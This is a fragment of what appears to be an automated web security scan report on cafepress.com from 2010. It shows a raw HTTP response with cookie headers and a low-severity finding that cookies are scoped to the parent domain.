HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59931 Date: Sun, 26 Dec 2010 13:48:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59931 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.25. http://www.cafepress.com/+magnets
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+magnets
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ cp_sc=100214; domain=cafep